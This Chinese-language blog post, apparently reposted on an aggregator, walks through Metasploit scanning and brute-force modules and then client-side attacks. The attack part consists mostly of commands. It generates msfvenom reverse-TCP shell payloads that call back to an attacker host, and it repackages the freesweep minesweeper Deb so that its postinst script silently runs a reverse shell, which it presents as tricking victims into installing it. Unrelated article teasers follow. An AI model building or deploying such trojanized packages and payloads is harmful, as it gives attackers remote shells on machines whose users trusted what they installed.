MSF弱点扫描

news2024/9/22 7:09:36

● 根据信息收集结果搜索漏洞利用模块
● 结合外部漏洞扫描系统对大IP地址段进行批量扫描
● 误判率、漏判率

VNC密码破解

use auxiliary/scanner/vnc/vnc_login

● VNC无密码访问

use auxiliary/scanner/vnc/vnc_none_auth

RDP远程桌面漏洞

use auxiliary/scanner/rdp/ms12_020_check

检查不会造成DoS攻击

设备后门

use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/fortinet_backdoor

在这里插入图片描述

VMWare EXSi密码爆破

use auxiliary/scanner/vmware/vmauthd_login

● 如果爆破成功可以使用下面的模块去列出虚拟机

use auxiliary/scanner/vmware/vmware_enum_vms

利用WEB API远程开启虚拟机

use auxiliary/admin/vmware/poweron_vm

HTTP 弱点扫描

● 过期证书

use auxiliary/scanner/http/cert

● 显示目录及文件

use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/files_dir

● WebDAV Unicode编码身份验证绕过

use auxiliary/scanner/http/dir_webdav_unicode_bypass

● Tomcat管理登录页面

use auxiliary/scanner/http/tomcat_mgr_login

● 基于HTTP方法的身份验证绕过

use auxiliary/scanner/http/verb_auth_bypass

● wordpress密码爆破

use auxiliary/scanner/http/wordpress_login_enum

WMAP WEB应用扫描器

● 根据SQLMAP的工作方式开发

load wmap #加载扫描器

wmap_sites -a http://1.1.1.1   #添加站点
wmap_targets -t http://1.1.1.1/mutillidae/index.php  #扫描目标
wmap_run -t  #加载扫描模块
wmap_run -e   #执行扫描模块
wmap_vulns -l  #列出目标主机
vulns

Openvas

● Load openvas
○ 命令行模式、需要配置、使用繁琐
● 导入nbe格式扫描日志

db_import openvas.nbe  #导入openvas导出的报告

MSF直接调用NESSUS执行扫描

load nessus  #调用nessus

在这里插入图片描述

nessus_help  #查看命令

在这里插入图片描述

nessus_connect 用户名:密码@127.0.0.1  #连接本机的nessus

在这里插入图片描述

● 还有其他的命令他家自行尝试,个人感觉不是太好用

MSF客户端渗透

● 在无法突破网络边界的情况下转而攻击客户端
○ 社会工程学攻击
○ 进而渗透线上业务网络
● 含有漏洞利用代码的WEB站点
○ 利用客户端漏洞
● 含有漏洞利用代码的DOC、PDF等文档
● 诱骗被害者执行Payload

诱骗被害者执行Payload(windows)

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
#生成payload

在这里插入图片描述

● 服务器段准备,侦听4444端口
在这里插入图片描述

● 然后只需要客户端去执行,这边就能获得shell
在这里插入图片描述

诱骗被害者执行Payload(Linux Deb安装包)

apt-get --download-only install freesweep
  #安装正常的程序包

在这里插入图片描述

dpkg -x freesweep_1.0.2-1_amd64.deb free 
  ##进行解包

在这里插入图片描述

mkdir DEBIAN
vi control               
vi postinst

#在文件夹中创建一个目录并在文件夹中创建两个文件

在这里插入图片描述

● 编辑control的内容

Package: freesweep
Version: 1.0.2-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text.based minesweeper
	Freesweep is an implementation of the popular minesweeper game,where
	one tries to find all the mines without igniting any,based on hints given
	by the computer. Unlike most implementations of this game, Freesweep
	works in any visual text display - in Linux console,in an xterm, and in
	most text-based terminals currently in use

● 编辑postinst脚本

!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

● 给予脚本执行权限

chmod +X postinst

● 生成payload

msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.0.123 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores

在这里插入图片描述

● 重新打包

dpkg-deb --build /root/free

● 打包成功后将其放入指定目录中让对方下载
在这里插入图片描述

● 服务端准备好监听端口
在这里插入图片描述

● 客户端一安装就可以拿到shell

sudo dpkg -i free.deb

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/141249.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【系统设计】直播架构分析

【系统设计】直播架构分析

直播架构 1. 组成 三部分组成, 分别是 客户端(主播端 观众端) 、应用服务器集群 、 CDN 技术 2. 模块间交互方式 主播端 : 直播客户端开启直播间 —— 获取 CDN 推流地址 ——通过 CDN 协议推流到 CDN 服务器上 观众端&#x…
阅读更多...
软考信息安全工程师看什么教材?

软考信息安全工程师看什么教材?

教材在官网上都有给出具体的版本。 如何复习备考? 首先准备考教材,视频,资料等内容。(可分享) 了解考情: 通过历年真题分析历年考试相关知识内容的考查频度及分值占比,梳理出核心考点内容。第二…
阅读更多...
【CANN训练营第三季】Pytorch模型迁移

【CANN训练营第三季】Pytorch模型迁移

文章目录第4题第5题首先安装pytorch 参考:https://gitee.com/ascend/pytorch 安到测试这一步,报错,没办法继续了。 RuntimeError: Unsupported soc version: Ascend310 https://gitee.com/ascend/pytorch/issues/I68UDG?fromproject-issue …
阅读更多...
微软的AD登录

微软的AD登录

微软的AD登录最早在1999年出现,,,也就是我们知道的SSO,,具体原理不做过多展开。见官网 AD 官网 安装依赖 "azure/msal-browser": "^2.15.0","azure/msal-react": "^1.0.1",…
阅读更多...
XXE - XML外部实体注入攻击

XXE - XML外部实体注入攻击

XXE漏洞是什么? xxe(xml External Entity attack),在可以解析XML语言的地方,攻击者提交恶意的XML代码并被执行后,获取服务器中本应被保护的数据。对于XXE漏洞最为关键的部分是DTD文档类型,DTD …
阅读更多...
全球 5G RAN 市场呈现强劲增长

全球 5G RAN 市场呈现强劲增长

根据Future Market Insights的一份新报告,全球对5G RAN的需求预计将在2022年和2032年以28.7%的健康CAGR增长,到2032年达到342亿美元的净值。 5G RAN市场蜂窝设备利用无线电波进行通信。这些设备将用户的语音和移动数据转换成数字化信号,以无…
阅读更多...
Vue--》vue3中的计算属性与监视的使用讲解

Vue--》vue3中的计算属性与监视的使用讲解

computed函数与Vue2.x中的computed配置功能一致&#xff0c;只不过在Vue3.x中我们需要按需导入该函数。因为Vue3.x是向下兼容Vue2语法的&#xff0c;所以我们可以写成既有 setup 又有 Vue2中的computed函数&#xff0c;如下代码示例&#xff1a;<template><h1>个人…
阅读更多...
IIC(I2C)协议详解

IIC(I2C)协议详解

1.简介IIC,即IC&#xff0c;全称 Inter-Integrated Circuit&#xff0c;字面上的意思是集成电路之间&#xff0c;它其实是IC Bus简称&#xff0c;所以中文应该叫 集成电路总线 &#xff0c;它是一种串行通信总线&#xff0c;使用多主从架构&#xff0c;由飞利浦公司在1980年代为…
阅读更多...
魔兽世界服务端源码各个重要文件详细情况说明——魔兽世界开服

魔兽世界服务端源码各个重要文件详细情况说明——魔兽世界开服

魔兽服务端开服源文件各文件翻译很多文件在服务器中我们知道是跟什么有关&#xff0c;但就是不知道其作用是什么。就算我们知道在这些地方中的文件都是有着不小的作用。但是由于不知道各个文件代表的是什么意思所以在面对这些文件的时候都会有无从下手的感觉&#xff0c;所以今…
阅读更多...
云渲染市场安全吗?

云渲染市场安全吗?

云渲染虽然在3D制作行业已经日益普及&#xff0c;但仍有人持观望态度&#xff1a;云渲染市场安全吗&#xff1f;使用云渲染是否能够保证我的数据安全、财产安全等问题&#xff0c;今天小编就来跟大家探讨一下这个问题。首先&#xff0c;在解答云渲染市场是否安全这个问题之前&a…
阅读更多...
MobarX远程登录虚拟机

MobarX远程登录虚拟机

环境&#xff1a;宿主机WIN10&#xff0c;virtualBox安装的ubuntu16&#xff1b; 前提条件&#xff1a;宿主机和ubuntu能够互相ping通&#xff1b; 步骤&#xff1a; 第一步&#xff1a;添加网卡类型为“仅主机的网络”&#xff08;MobarX登录Ubuntu需要的网卡&#xff09; …
阅读更多...
Session详解,学习Session(包含底层分析和使用)

Session详解,学习Session(包含底层分析和使用)

什么是sessionsession在网络应用中称为“会话控制”&#xff0c;是服务器为了保存用户状态而创建的一个特殊的对象。简而言之&#xff0c;session就是一个对象&#xff0c;用于存储信息。 session和cookie的比较 cookie保存在客户端&#xff0c;session保存在服务端cookie作用于…
阅读更多...
2023企业在媒体邀约的过程中应该注意哪些细节

2023企业在媒体邀约的过程中应该注意哪些细节

很多企业在发展壮大之后&#xff0c;都会成立自己的品牌公关部&#xff0c;来进行日常公关的维护工作&#xff0c;这就需要邀请大量的媒体资源和媒体人脉来进行邀约&#xff0c;企业通常会邀请那些服务好、资深的媒介机构&#xff0c;进行明确的分工&#xff0c;从而完成每一场…
阅读更多...
廉颇未老,VB语言迎来春天,中文编程也绝处逢生

廉颇未老,VB语言迎来春天,中文编程也绝处逢生

“VB语言过时了&#xff0c;早就淘汰了”&#xff0c;不少程序员认为&#xff0c;如今VB上不了台面。颠覆许多人认知的是&#xff0c;VB&#xff08;Visual Basic&#xff09;作为微软“亲儿子”&#xff0c;借助微软平台在全球用户中仍有着稳固地位&#xff0c;是被大家看轻的…
阅读更多...
技术分享 | Redis 之分布式锁

技术分享 | Redis 之分布式锁

作者&#xff1a;贲绍华 爱可生研发中心工程师&#xff0c;负责项目的需求与维护工作。其他身份&#xff1a;柯基铲屎官。 本文来源&#xff1a;原创投稿 *爱可生开源社区出品&#xff0c;原创内容未经授权不得随意使用&#xff0c;转载请联系小编并注明来源。 引言&#xff1a…
阅读更多...
Redis事务

Redis事务

Redis事务官网&#xff1a; http://redis.cn/topics/transactions.html 一、Redis事务的特性 Redis事务可以一次执行多个命令&#xff0c;并且满足以下两个重要的特性 事务是一个单独的隔离操作&#xff1a;事务中的所有命令都会序列化、按顺序地执行。事务在执行的过程中&a…
阅读更多...
CSS3 calc()函数

CSS3 calc()函数

CSS3 calc()函数 概述 在CSS3中&#xff0c;我们可以使用calc()函数通过“计算”的方式来定义某一个属性的取值。 使用 语法 属性: calc(表达式);说明 可以使用calc()函数计算元素的width、margin、padding、font-size等。 对于calc()函数&#xff0c;有以下5条运算规则…
阅读更多...
我的第一个基于vue-cli的程序

我的第一个基于vue-cli的程序

文章目录一 准备环境1.1 node.js安装1.2 安装Vue工具(Vue CLI)第一种安装方式【可能会遇到失败&#xff0c;如果失败请尝试第二种方式】下载的文件的存放位置第二种安装方式安装cnpm二 操作步骤2.0 进行目标文件夹下的命令行窗口2.1 创建项目2.2 成功2.3 运行项目2.4 效果一 准…
阅读更多...
力扣1700.无法吃午餐的学生数量

力扣1700.无法吃午餐的学生数量

题目描述&#xff1a; 学校的自助午餐提供圆形和方形的三明治&#xff0c;分别用数字 0 和 1 表示。所有学生站在一个队列里&#xff0c;每个学生要么喜欢圆形的要么喜欢方形的。 餐厅里三明治的数量与学生的数量相同。所有三明治都放在一个 栈 里&#xff0c;每一轮&#xff…
阅读更多...
戴尔成就300015电脑出现错误代码怎么重新安装系统?

戴尔成就300015电脑出现错误代码怎么重新安装系统?

戴尔成就300015电脑出现错误代码怎么重新安装系统&#xff1f;有用户使用这款戴尔成就300015电脑的时候&#xff0c;总是在使用过程中无故的冒出错误代码&#xff0c;导致系统崩溃了。那么这个情况怎么去进行问题的修复呢&#xff1f;一起来看看详细的解决方法分享吧。 准备工作…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023